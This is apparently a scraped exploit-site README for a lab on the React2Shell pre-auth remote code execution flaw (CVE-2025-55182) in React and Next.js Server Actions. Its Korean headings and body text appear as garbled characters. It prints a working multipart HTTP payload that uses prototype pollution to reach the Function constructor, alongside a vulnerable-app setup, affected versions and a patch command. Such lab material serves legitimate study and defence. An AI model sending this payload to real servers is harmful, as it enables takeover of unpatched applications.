Share
## https://sploitus.com/exploit?id=CEAD464C-06DF-5281-85C5-8A7C00FEAC94
# CVE-2025-55182 React2Shell μ·¨μ½μ μ€μ΅
> μ¬μ©λ AI : Claude Opus 4.5
> **β οΈ κ²½κ³ **: μ΄ νκ²½μ **κ΅μ‘ λ° μ°κ΅¬ λͺ©μ **μΌλ‘λ§ μ¬μ©νμΈμ.
## μ·¨μ½μ κ°μ
| νλͺ© | λ΄μ© |
|------|------|
| **CVE** | CVE-2025-55182 (React) / CVE-2025-66478 (Next.js) |
| **μ΄λ¦** | React2Shell |
| **CVSS** | 10.0 (Critical) |
| **μ ν** | Pre-Auth Remote Code Execution |
| **μμΈ** | Flight νλ‘ν μ½ μμ§λ ¬ν μ νλ‘ν νμ
μ€μΌ |
## 곡격 μ리
```
βββββββββββββββββββββββββββ
β Attacker β
βββββββββββββ¬ββββββββββββββ
β
POST Request + Next-Action Header
multipart/form-data payload
β
βΌ
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β Next.js Server β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β 1. Next-Action ν€λ β Server Action νΈλ¦¬κ±° β
β 2. multipart νμ΄λ‘λ β Flight νλ‘ν μ½ μμ§λ ¬ν β
β 3. Fake Chunk κ°μ²΄μ then() λ©μλ νΈμΆ β
β 4. __proto__ μ°Έμ‘° β νλ‘ν νμ
μ€μΌ β
β 5. Function μμ±μ μ£Όμ
β RCE β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
```
### μ΅μ€νλ‘μ νμ΄λ‘λ ꡬ쑰
```http
POST / HTTP/1.1
Next-Action: x
Content-Type: multipart/form-data; boundary=----Boundary
------Boundary
Content-Disposition: form-data; name="0"
{"_response":{"_formData":{"get":"Function"}},"then":"$1:__proto__:then"}
------Boundary
Content-Disposition: form-data; name="1"
$@0
------Boundary--
```
**ν΅μ¬ μμ:**
- `Next-Action` ν€λλ‘ Server Action νΈλ¦¬κ±°
- Field 0: Fake Chunk with `then` method for promise-like behavior
- Field 1: `$@0` μ°Έμ‘°λ‘ νλ‘ν νμ
μ²΄μΈ μν
- `__proto__:then`μ ν΅ν΄ `Function` μμ±μ μ κ·Ό
---
## λΉ λ₯Έ μμ
```bash
cd vulnerable-app
# μμ‘΄μ± μ€μΉ
npm install
# κ°λ° μλ² μμ
npm run dev
```
http://localhost:3000 μμ μ μ
---
## λλ ν 리 ꡬ쑰
```
react-rce/
βββ README.md
βββ vulnerable-app/ # μ·¨μ½ν Next.js μ±
β βββ package.json # Next.js 15.0.3 (μ·¨μ½ λ²μ )
β βββ app/
β βββ page.js # UI (CVE μ 보 + RCE μμ°)
β βββ actions.js # Server Actions
β βββ globals.css
βββ exploit/ # 곡격 λꡬ (μ ν)
βββ exploit.py # CVE-2025-55182 PoC
```
---
## μν₯ λ°λ λ²μ
- **React**: 19.0.0, 19.1.0, 19.1.1, 19.2.0
- **Next.js**: 15.x, 16.x (App Router μ¬μ© μ)
- **ν¨ν€μ§**: react-server-dom-webpack, react-server-dom-turbopack
---
## λ°©μ΄ λ°©λ²
```bash
# ν¨μΉ λ²μ μΌλ‘ μ
κ·Έλ μ΄λ
npm install next@15.5.7 react@19.2.1 react-dom@19.2.1
```
---
## μ°Έκ³
- [Next.js 보μ 곡μ§](https://nextjs.org/blog/CVE-2025-66478)
- [GitHub: assetnote/react2shell-scanner](https://github.com/assetnote/react2shell-scanner)
- [GitHub: freeqaz/react2shell](https://github.com/freeqaz/react2shell)